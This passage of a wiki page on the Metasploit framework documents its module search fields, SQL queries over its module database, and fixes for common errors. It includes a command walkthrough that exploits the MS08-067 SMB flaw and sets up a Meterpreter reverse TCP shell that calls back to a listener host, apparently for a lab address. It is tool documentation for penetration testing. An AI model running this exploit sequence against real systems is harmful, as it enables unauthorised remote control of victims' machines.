| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB], [http://www.osvdb.org/ OSBDB] ID or any<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it's time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments will show info about currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit and allows the attacker to run remote commands on exploited systems. Reverse TCP is technique when the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show optons}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
   Name     Current Setting  Required  Description<br />
   ----     ---------------  --------  -----------<br />
   RHOST    192.168.56.102   yes       The target address<br />
   RPORT    445              yes       Set the SMB service port<br />
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
   Name      Current Setting  Required  Description<br />
   ----      ---------------  --------  -----------<br />
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)<br />
   LHOST                      yes       The listen address<br />
   LPORT     4444             yes       The listen port<br />
}}<br />
<br />
Now set {{ic|LHOST}} to an address of your own machine that the target can reach; this is where the exploited computer will connect back to. The handler listens on {{ic|LPORT}} (4444 by default), so that port must not be blocked by a firewall on your side:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Before launching, you can run {{ic|check}} to let the module test whether the target appears vulnerable without actually exploiting it. Then launch the attack:<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If the exploit succeeds, you will be dropped into a Meterpreter session running with the privileges of the exploited process, from which you can control the remote computer. See [[#Meterpreter]] for available commands.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not filter the results correctly when more than one filter is specified. See [https://dev.metasploit.com/redmine/issues/8822 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since {{ic|msfconsole}} caches the metadata of every module in the PostgreSQL database (once the database is connected and the cache has been built), it is easy to make powerful search queries without the {{ic|search}} front-end command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (its purpose is not documented here)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have 3 columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}. The exception is the {{ic|module_details}} table, which has 16 columns.<br />
<br />
The {{ic|detail_id}} column is a foreign key: it holds the {{ic|id}} of the corresponding row in {{ic|module_details}}, so the other tables are joined to it with {{ic|ON module_details.id {{=}} ''table_name''.detail_id}}.<br />
<br />
To see all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
A module can have several of the following, which is why each is kept in its own table rather than as a column of {{ic|module_details}}:<br />
<br />
* Architecture ({{ic|module_archs}})<br />
* Platform ({{ic|module_platforms}})<br />
* Target ({{ic|module_targets}})<br />
<br />
Columns of {{ic|module_details}} that are useful for filtering:<br />
<br />
* module type ({{ic|mtype}}: exploit, auxiliary, post, payload, ...)<br />
* stance ({{ic|stance}}: aggressive or passive)<br />
* privileged ({{ic|privileged}})<br />
* path<br />
* name ({{ic|name}})<br />
* refname ({{ic|refname}})<br />
* rank ({{ic|rank}})<br />
* disclosure date ({{ic|disclosure_date}})<br />
<br />
=== Database search examples ===<br />
<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, include platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all aggressive exploits for the Windows platform. In Metasploit an ''aggressive'' module actively connects to the target service, whereas a ''passive'' module (typically a client-side or browser exploit) starts a listener and waits for the victim to connect:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for the Windows platform with rank >= 500 (''Great'' or ''Excellent'') disclosed in 2013 or later:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-01-01';<br />
<br />
Show all aggressive exploits for the Windows platform with rank >= 500 and include information about each module's targets (a module that defines several targets appears once per target):<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets ON module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
ORDER BY target;<br />
<br />
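Because the {{ic|search}} command does not combine several filters correctly (see [[#Search does not filter properly]]), a single SQL statement with any number of conditions is the practical workaround. The following two queries are added here as a worked example; they are not part of the original page or of Metasploit itself. The first lists Windows exploits of rank ''Great'' (500) or better whose name mentions SMB and that carry at least one CVE reference, with all their references collected into one column. The second starts from an advisory identifier and finds the module(s) and targets that cover it. Both assume the module cache tables described above; the exact format of {{ic|module_refs.name}} (strings such as {{ic|CVE-''year''-''number''}} or {{ic|MSB-MS08-067}}) and the availability of {{ic|string_agg}} (PostgreSQL 9.0 or later) are assumptions not stated on this page.<br />
<br />
```sql
-- Added example (not from the ArchWiki page): a multi-filter module search
-- done in SQL, as a workaround for the msfconsole "search" filtering bug.
-- Assumes the msf module cache tables described above; the format of
-- module_refs.name ("CVE-<year>-<n>", "MSB-MS08-067", "URL-...") and
-- string_agg (PostgreSQL >= 9.0) are assumptions.
SELECT d.refname,
       d.rank,                                  -- 500 = Great, 600 = Excellent
       DATE(d.disclosure_date)                  AS disclosed,
       d.stance,                                -- aggressive / passive
       string_agg(r.name, ', ' ORDER BY r.name) AS refs
FROM module_details d
JOIN module_platforms p ON p.detail_id = d.id
JOIN module_refs      r ON r.detail_id = d.id
WHERE d.mtype = 'exploit'
  AND p.name  = 'windows'
  AND d.rank >= 500
  AND d.name ILIKE '%smb%'                      -- case-insensitive keyword
  -- keep only modules that have at least one CVE reference
  AND EXISTS (SELECT 1 FROM module_refs c
              WHERE c.detail_id = d.id AND c.name LIKE 'CVE-%')
GROUP BY d.id, d.refname, d.rank, d.disclosure_date, d.stance
ORDER BY d.disclosure_date DESC, d.rank DESC;

-- Reverse lookup: which module(s) reference a given bulletin, and which
-- targets do they define? Useful when starting from an advisory rather
-- than from a module name.
SELECT d.refname, d.rank, t.name AS target
FROM module_details d
JOIN module_refs    r ON r.detail_id = d.id
JOIN module_targets t ON t.detail_id = d.id
WHERE r.name LIKE '%MS08-067%'
ORDER BY d.refname, t.id;
```
<br />
The {{ic|EXISTS}} subquery keeps the CVE requirement separate from the {{ic|module_refs}} join, so the {{ic|refs}} column still lists every reference of a matching module (OSVDB, URLs, bulletins), not only the CVE entries.<br />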
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values and the number of modules (of any type, not only exploits) that list each of them, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
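The count above includes modules of every type. The following query is added here as a worked example (not part of the original page): it joins back to {{ic|module_details}} so that the ranking is by number of exploits, with an extra column counting exploits of rank ''Great'' (500) or better, and drops platforms that only have auxiliary, post or payload modules. It uses only the tables and columns described above.<br />
<br />
```sql
-- Added example (not from the ArchWiki page): platform popularity counted
-- over exploits only, with a second column for high-quality exploits.
-- Uses only the tables and columns described on this page.
SELECT p.name AS platform,
       COUNT(*)                                                AS modules,
       SUM(CASE WHEN d.mtype = 'exploit' THEN 1 ELSE 0 END)    AS exploits,
       SUM(CASE WHEN d.mtype = 'exploit' AND d.rank >= 500
                THEN 1 ELSE 0 END)                             AS great_or_better
FROM module_platforms p
JOIN module_details d ON d.id = p.detail_id
GROUP BY p.name
-- HAVING cannot use output aliases, so the expression is repeated
HAVING SUM(CASE WHEN d.mtype = 'exploit' THEN 1 ELSE 0 END) > 0
ORDER BY exploits DESC, great_or_better DESC, platform;
```
<br />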
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
Options reset to their defaults when you select another module. To keep a value across module changes, set it globally with {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected a VNC injection payload but are unable to click or otherwise interact with the remote desktop, the {{ic|ViewOnly}} option was left at its default. To fix this, set it to {{ic|false}} and re-run the exploit:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions: it is readable only by the {{ic|root}} user and group (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If {{ic|db_connect}} prints nothing, but a later command shows a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
the {{ic|postgresql}} service is most likely not running. Check the connection state with {{ic|db_status}} inside {{ic|msfconsole}}, and verify that the service is active with {{ic|systemctl status postgresql}}.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>